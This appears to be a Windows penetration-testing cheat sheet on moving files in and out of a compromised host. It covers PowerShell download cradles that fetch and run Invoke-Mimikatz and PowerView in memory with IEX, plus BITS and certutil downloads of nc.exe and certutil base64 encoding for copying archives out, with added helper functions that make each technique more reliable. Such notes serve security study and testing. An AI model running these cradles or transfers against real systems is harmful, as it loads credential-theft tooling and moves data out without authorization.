#The System.Net.WebClient class can be used to download a file over HTTP(S) to disk.
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:PORT/file.EXT',"C:\Outfile.EXT")
#Invoke-WebRequest is available from PowerShell 3.0 onward; it is slower than WebClient.
#Its aliases iwr, curl and wget can be used instead (curl and wget are aliases in Windows PowerShell 5.1 only; PowerShell 6+ dropped them so the real tools are not shadowed)
Invoke-WebRequest -uri http://<IP>:PORT/file.Ext -OutFile file.Ext
#Execute a payload directly in memory using Invoke-Expression (alias iex). Nothing is written to disk, but the script text is still inspected by AMSI on Windows 10+.
IEX (New-Object Net.WebClient).DownloadString('http://<IP>:PORT/Invoke-Mimikatz.ps1')
#IEX also accepts pipeline input
Invoke-WebRequest https://<IP>:PORT/Invoke-Mimikatz.ps1 | iex
There may be cases where the Internet Explorer first-launch configuration has not been completed, which makes Invoke-WebRequest fail when it tries to parse the response with the IE DOM engine.
This can be bypassed with the -UseBasicParsing parameter (on PowerShell 6+ basic parsing is the default and the switch is a harmless no-op).
Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
# FIX
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
#PowerView is now loaded in memory, so its functions can be called directly
Invoke-CheckLocalAdminAccess
ComputerName IsAdmin
------------ -------
localhost      False
#with administrative access to the machine, Internet Explorer's first-run customization can be disabled so the IE engine becomes usable (the same value under HKCU\SOFTWARE\Microsoft\Internet Explorer\Main affects only the current user and needs no admin rights)
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
PowerShell download cradles that do not go through the Internet Explorer engine (WebClient, for example) are unaffected by the first-run check and can be used instead. Harmj0y has compiled an extensive list of PowerShell download cradles. It is worth getting familiar with them and their individual nuances, such as whether a cradle honours the system proxy or touches disk, so the appropriate one can be selected for the situation.
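The cradles above pick one trade-off each (fast WebClient with no proxy handling, or Invoke-WebRequest with the IE dependency). The function below is an added example, not code from the original notes or from Harmj0y's list: an in-memory cradle that honours the system proxy with the current user's credentials, never writes to disk, sidesteps the first-launch error, and refuses to execute the script unless its SHA-256 matches a value computed on the serving side. `<IP>:PORT`, the script names and the hash are placeholders.

```powershell
# Added example, not part of the original notes: an in-memory cradle that honours
# the system proxy with the current user's credentials, never writes to disk, and
# refuses to run the script unless its SHA-256 matches a value you computed on the
# serving side. <IP>:PORT, the script name and the hash are placeholders/assumptions.
function Invoke-VerifiedCradle {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$ExpectedSha256,
        [switch]$UseWebClient        # take the WebClient path instead of Invoke-WebRequest
    )

    if ($UseWebClient) {
        # WebClient is fast and has no IE dependency, but it only uses the proxy you give it.
        $wc = New-Object System.Net.WebClient
        $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
        [byte[]]$bytes = $wc.DownloadData($Url)
    }
    else {
        # -UseBasicParsing sidesteps the IE first-launch error on Windows PowerShell 5.1;
        # on PowerShell 6+ basic parsing is already the default, so the switch is harmless.
        $resp = Invoke-WebRequest -Uri $Url -UseBasicParsing -UseDefaultCredentials
        [byte[]]$bytes = $resp.RawContentStream.ToArray()
    }

    # Hash the raw bytes so the value matches `sha256sum <file>` on the serving host.
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $hash = [BitConverter]::ToString($sha.ComputeHash($bytes)).Replace('-', '').ToLower()
    if ($hash -ne $ExpectedSha256.ToLower()) {
        throw "Hash mismatch for $Url : got $hash, expected $ExpectedSha256 (not executing)"
    }

    # Decode as UTF-8 and drop a BOM if present; a leading U+FEFF confuses the parser.
    $script = [System.Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    Invoke-Expression $script
}

# Usage (placeholders): compute the hash where the script is served, e.g. `sha256sum Invoke-Mimikatz.ps1`
# Invoke-VerifiedCradle -Url 'http://<IP>:PORT/Invoke-Mimikatz.ps1' -ExpectedSha256 '<sha256>'
# Invoke-VerifiedCradle -Url 'http://<IP>:PORT/PowerView.ps1' -ExpectedSha256 '<sha256>' -UseWebClient
```

Hashing the raw bytes rather than the decoded string keeps the value comparable with `sha256sum` on the serving host; hashing a re-encoded string would silently diverge on a BOM or a non-UTF-8 file. The mismatch check is what stops a tampered or truncated download from reaching `Invoke-Expression`.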
#Background Intelligent Transfer Service (BITS)
#bitsadmin can download from HTTP(S) sites and SMB shares; it is deprecated but still ships with Windows (the job name here is "n")
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
#The BitsTransfer PowerShell module exposes the same service: it supports downloads and uploads, credentials, and explicitly specified proxy servers, and its jobs survive reboots and network interruptions.
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
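The one-liner above blocks until the transfer finishes and uses whatever proxy the client is configured with. The function below is an added example, not code from the original notes: it runs the job asynchronously (so it survives a reboot or a dropped link), optionally routes it through an explicit proxy with credentials, and only commits the file to its final name once BITS reports `Transferred`. `<IP>`, the proxy address and the credential prompt are placeholders.

```powershell
# Added example, not part of the original notes: an asynchronous BITS download that
# survives reboots and lost connectivity, can go through an explicit proxy with
# credentials, and is committed to its final name only once the job has finished.
# <IP>, the proxy URL and the credentials are placeholders/assumptions.
Import-Module BitsTransfer

function Get-FileViaBits {
    param(
        [Parameter(Mandatory)][string]$Source,
        [Parameter(Mandatory)][string]$Destination,
        [string]$ProxyList,                 # e.g. 'http://proxy.corp.local:8080'; omit to use the client's own proxy settings
        [pscredential]$Credential,          # only for servers that require authentication
        [int]$TimeoutSeconds = 300
    )

    $params = @{
        Source       = $Source
        Destination  = $Destination
        DisplayName  = 'n'                  # same job name the bitsadmin example above uses
        Asynchronous = $true
    }
    if ($ProxyList)  { $params.ProxyUsage = 'Override'; $params.ProxyList = $ProxyList }
    if ($Credential) { $params.Credential = $Credential; $params.Authentication = 'Basic' }

    $job = Start-BitsTransfer @params
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)

    # An asynchronous job writes to a temp file; the destination name only appears after Complete-BitsTransfer.
    # TransientError is included because BITS retries those on its own.
    while ($job.JobState -in 'Queued', 'Connecting', 'Transferring', 'TransientError') {
        if ((Get-Date) -gt $deadline) {
            Remove-BitsTransfer -BitsJob $job
            throw "BITS job timed out in state $($job.JobState)"
        }
        Start-Sleep -Seconds 2
    }

    switch ($job.JobState) {
        'Transferred' {
            Complete-BitsTransfer -BitsJob $job
            return Get-Item -Path $Destination
        }
        default {
            $reason = $job.ErrorDescription
            Remove-BitsTransfer -BitsJob $job
            throw "BITS job ended in state $($job.JobState): $reason"
        }
    }
}

# Usage (placeholders):
# Get-FileViaBits -Source 'http://<IP>/nc.exe' -Destination 'C:\Temp\nc.exe'
# Get-FileViaBits -Source 'http://<IP>/nc.exe' -Destination 'C:\Temp\nc.exe' `
#     -ProxyList 'http://proxy.corp.local:8080' -Credential (Get-Credential)
```

Polling `JobState` and finishing with `Complete-BitsTransfer` is the documented pattern for asynchronous jobs; the `Remove-BitsTransfer` on the failure paths matters because an abandoned job otherwise lingers in the BITS queue, where `Get-BitsTransfer` (and a defender running `bitsadmin /list /allusers`) will find it.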
#certutil is available in all Windows versions; -encode base64-encodes a file in PEM style (with -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines) so it can be copied out through the terminal
certutil.exe -encode C:\Users\Alfred\Downloads\backups\backup.zip C:\Windows\Temp\backup.b64
#print the encoded file, then copy and paste it into a file on your machine
type C:\Windows\Temp\backup.b64
#remove the BEGIN/END CERTIFICATE lines before decoding, otherwise base64 -d rejects the input
vi backup.base64
base64 -d backup.base64 > backup.zip
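The copy-and-paste route has two failure modes the steps above leave to the operator: the PEM header and footer that `certutil -encode` adds break `base64 -d`, and a paste that drops or wraps a line corrupts the archive silently. The function below is an added example, not code from the original notes: it runs `certutil -encode`, strips the header and footer lines, proves the stripped text round-trips to the original bytes before you paste anything, and records the SHA-256 so the decoded file can be verified on the other side. The paths are placeholders.

```powershell
# Added example, not part of the original notes: encode a file with certutil as the
# steps above do, strip the -----BEGIN/END CERTIFICATE----- lines that make
# `base64 -d` reject the input, verify the stripped text round-trips to the original
# bytes, and report the SHA-256 to compare after decoding. Paths are placeholders.
function ConvertTo-PasteableBase64 {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$OutFile = (Join-Path $env:TEMP ((Split-Path $Path -Leaf) + '.b64'))
    )

    $raw = Join-Path $env:TEMP 'certutil-encode.tmp'
    # certutil -encode writes PEM-style output: header line, 64-char lines, footer line.
    $null = & certutil.exe -f -encode $Path $raw
    if ($LASTEXITCODE -ne 0) { throw "certutil -encode failed with exit code $LASTEXITCODE" }

    # Keep only the base64 body; the dashed header and footer are not valid base64.
    $body = @(Get-Content -Path $raw | Where-Object { $_ -notmatch '^-----' })
    Remove-Item -Path $raw -Force

    # Round-trip check: decoding the stripped text must reproduce the original file's hash.
    $decoded     = [Convert]::FromBase64String(($body -join ''))
    $sha         = [System.Security.Cryptography.SHA256]::Create()
    $decodedHash = [BitConverter]::ToString($sha.ComputeHash($decoded)).Replace('-', '').ToLower()
    $fileHash    = (Get-FileHash -Algorithm SHA256 -Path $Path).Hash.ToLower()
    if ($decodedHash -ne $fileHash) {
        throw "Round-trip mismatch for $Path; do not paste this output"
    }

    Set-Content -Path $OutFile -Value $body -Encoding Ascii
    [pscustomobject]@{
        OutFile = $OutFile
        Lines   = $body.Count      # how many lines you will have to paste
        Sha256  = $fileHash        # compare with `sha256sum backup.zip` after decoding
    }
}

# Usage (placeholders):
# ConvertTo-PasteableBase64 -Path 'C:\Users\Alfred\Downloads\backups\backup.zip'
# type $env:TEMP\backup.zip.b64     # paste into backup.base64 on your box, then: base64 -d backup.base64 > backup.zip
```

Because the header and footer are already gone, the `vi` step above reduces to pasting; the reported `Sha256` is what you check with `sha256sum backup.zip` on the receiving side, which catches a truncated or line-wrapped paste that `base64 -d` would otherwise accept without complaint.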
#AMSI / Microsoft Defender currently detects this as malicious certutil usage, so expect it to be blocked and logged on a monitored host
certutil.exe -verifyctl -split -f http://<IP>/nc.exe